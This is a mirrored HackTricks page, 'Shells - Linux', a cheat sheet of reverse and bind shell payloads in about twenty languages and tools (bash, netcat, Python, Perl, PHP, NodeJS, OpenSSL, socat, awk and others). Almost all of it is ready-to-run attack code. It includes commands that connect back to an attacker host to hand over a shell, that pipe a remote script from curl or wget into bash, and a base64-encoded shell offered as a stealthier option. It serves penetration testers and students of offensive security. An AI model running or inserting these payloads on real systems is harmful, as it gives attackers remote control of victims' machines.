mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
363 lines
15 KiB
Markdown
363 lines
15 KiB
Markdown
# Shells - Linux
|
||
|
||
<details>
|
||
|
||
<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
||
</details>
|
||
|
||
**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com)
|
||
|
||
## Full TTY
|
||
|
||
**Once you get a reverse shell**[ **read this page to obtain a full TTY**](full-ttys.md)**.**
|
||
|
||
## Bash | sh
|
||
|
||
```bash
|
||
curl https://reverse-shell.sh/1.1.1.1:3000 | bash
|
||
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
|
||
bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
|
||
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
|
||
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done
|
||
|
||
#Short and bypass (credits to Dikline)
|
||
(sh)0>/dev/tcp/10.10.10.10/9091
|
||
#after getting the previous shell to get the output to execute
|
||
exec >&0
|
||
```
|
||
|
||
Don't forget to check with other shells: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash.
|
||
|
||
### Symbol safe shell
|
||
|
||
```bash
|
||
#If you need a more stable connection do:
|
||
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
|
||
|
||
#Stealthier method
|
||
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
|
||
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
|
||
```
|
||
|
||
#### Shell explanation
|
||
|
||
1. **`bash -i`**: This part of the command starts an interactive (`-i`) Bash shell.
|
||
2. **`>&`**: This part of the command is a shorthand notation for **redirecting both standard output** (`stdout`) and **standard error** (`stderr`) to the **same destination**.
|
||
3. **`/dev/tcp/<ATTACKER-IP>/<PORT>`**: This is a special file that **represents a TCP connection to the specified IP address and port**. 
|
||
* By **redirecting the output and error streams to this file**, the command effectively sends the output of the interactive shell session to the attacker's machine.
|
||
4. **`0>&1`**: This part of the command **redirects standard input (`stdin`) to the same destination as standard output (`stdout`)**. 
|
||
|
||
### Create in file and execute
|
||
|
||
```bash
|
||
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
|
||
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
|
||
```
|
||
|
||
## Forward Shell
|
||
|
||
You might find cases where you have an **RCE in a web app in a Linux machine** but due to Iptables rules or other kinds of filtering **you cannot get a reverse shell**. This "shell" allows you to maintain a PTY shell through that RCE using pipes inside the victim system.\
|
||
You can find the code in [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)
|
||
|
||
You just need to modify:
|
||
|
||
* The URL of the vulnerable host
|
||
* The prefix and suffix of your payload (if any)
|
||
* The way the payload is sent (headers? data? extra info?)
|
||
|
||
Then, you can just **send commands** or even **use the `upgrade` command** to get a full PTY (note that pipes are read and written with an approximate 1.3s delay).
|
||
|
||
## Netcat
|
||
|
||
```bash
|
||
nc -e /bin/sh <ATTACKER-IP> <PORT>
|
||
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
|
||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
|
||
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
|
||
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
|
||
```
|
||
|
||
## Telnet
|
||
|
||
```bash
|
||
telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
|
||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
|
||
telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
|
||
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
|
||
```
|
||
|
||
## Whois
|
||
|
||
**Attacker**
|
||
|
||
```bash
|
||
while true; do nc -l <port>; done
|
||
```
|
||
|
||
To send the command write it down, press enter and press CTRL+D (to stop STDIN)
|
||
|
||
**Victim**
|
||
|
||
```bash
|
||
export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done
|
||
```
|
||
|
||
## Python
|
||
|
||
```bash
|
||
#Linux
|
||
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
|
||
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
||
#IPv6
|
||
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
|
||
```
|
||
|
||
## Perl
|
||
|
||
```bash
|
||
perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||
```
|
||
|
||
## Ruby
|
||
|
||
```bash
|
||
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||
```
|
||
|
||
## PHP
|
||
|
||
```php
|
||
// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
|
||
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
|
||
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||
|
||
// Using 'proc_open' makes no assumptions about what the file descriptor will be.
|
||
// See https://security.stackexchange.com/a/198944 for more information
|
||
<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
|
||
|
||
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
|
||
```
|
||
|
||
## Java
|
||
|
||
```bash
|
||
r = Runtime.getRuntime()
|
||
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
|
||
p.waitFor()
|
||
```
|
||
|
||
## Ncat
|
||
|
||
```bash
|
||
victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
|
||
attacker> ncat -v 10.0.0.22 4444 --ssl
|
||
```
|
||
|
||
## Golang
|
||
|
||
```bash
|
||
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
|
||
```
|
||
|
||
## Lua
|
||
|
||
```bash
|
||
#Linux
|
||
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
|
||
#Windows & Linux
|
||
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||
```
|
||
|
||
## NodeJS
|
||
|
||
```javascript
|
||
(function(){
|
||
var net = require("net"),
|
||
cp = require("child_process"),
|
||
sh = cp.spawn("/bin/sh", []);
|
||
var client = new net.Socket();
|
||
client.connect(8080, "10.17.26.64", function(){
|
||
client.pipe(sh.stdin);
|
||
sh.stdout.pipe(client);
|
||
sh.stderr.pipe(client);
|
||
});
|
||
return /a/; // Prevents the Node.js application form crashing
|
||
})();
|
||
|
||
|
||
or
|
||
|
||
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
|
||
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")
|
||
|
||
or
|
||
|
||
-var x = global.process.mainModule.require
|
||
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
|
||
|
||
or
|
||
|
||
// If you get to the constructor of a function you can define and execute another function inside a string
|
||
"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
|
||
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
|
||
|
||
|
||
or
|
||
|
||
// Abuse this syntax to get a reverse shell
|
||
var fs = this.process.binding('fs');
|
||
var fs = process.binding('fs');
|
||
|
||
or
|
||
|
||
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
|
||
```
|
||
|
||
## OpenSSL
|
||
|
||
The Attacker (Kali)
|
||
|
||
```bash
|
||
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
|
||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
|
||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
|
||
```
|
||
|
||
The Victim
|
||
|
||
```bash
|
||
#Linux
|
||
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||
|
||
#Windows
|
||
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||
```
|
||
|
||
## **Socat**
|
||
|
||
[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
|
||
|
||
### Bind shell
|
||
|
||
```bash
|
||
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
|
||
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
|
||
```
|
||
|
||
### Reverse shell
|
||
|
||
```bash
|
||
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
|
||
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
|
||
```
|
||
|
||
## Awk
|
||
|
||
```bash
|
||
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
|
||
```
|
||
|
||
## Finger
|
||
|
||
**Attacker**
|
||
|
||
```bash
|
||
while true; do nc -l 79; done
|
||
```
|
||
|
||
To send the command write it down, press enter and press CTRL+D (to stop STDIN)
|
||
|
||
**Victim**
|
||
|
||
```bash
|
||
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done
|
||
|
||
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
|
||
```
|
||
|
||
## Gawk
|
||
|
||
```bash
|
||
#!/usr/bin/gawk -f
|
||
|
||
BEGIN {
|
||
Port = 8080
|
||
Prompt = "bkd> "
|
||
|
||
Service = "/inet/tcp/" Port "/0/0"
|
||
while (1) {
|
||
do {
|
||
printf Prompt |& Service
|
||
Service |& getline cmd
|
||
if (cmd) {
|
||
while ((cmd |& getline) > 0)
|
||
print $0 |& Service
|
||
close(cmd)
|
||
}
|
||
} while (cmd != "exit")
|
||
close(Service)
|
||
}
|
||
}
|
||
```
|
||
|
||
## Xterm
|
||
|
||
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
|
||
|
||
```bash
|
||
xterm -display 10.0.0.1:1
|
||
```
|
||
|
||
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
|
||
|
||
```bash
|
||
Xnest :1
|
||
```
|
||
|
||
You’ll need to authorise the target to connect to you (command also run on your host):
|
||
|
||
```bash
|
||
xhost +targetip
|
||
```
|
||
|
||
## Groovy
|
||
|
||
by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTE: Java reverse shell also work for Groovy
|
||
|
||
```bash
|
||
String host="localhost";
|
||
int port=8044;
|
||
String cmd="cmd.exe";
|
||
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
|
||
```
|
||
|
||
## Bibliography
|
||
|
||
{% embed url="https://highon.coffee/blog/reverse-shell-cheat-sheet/" %}
|
||
|
||
{% embed url="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell" %}
|
||
|
||
{% embed url="https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/" %}
|
||
|
||
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" %}
|
||
|
||
<details>
|
||
|
||
<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
||
</details>
|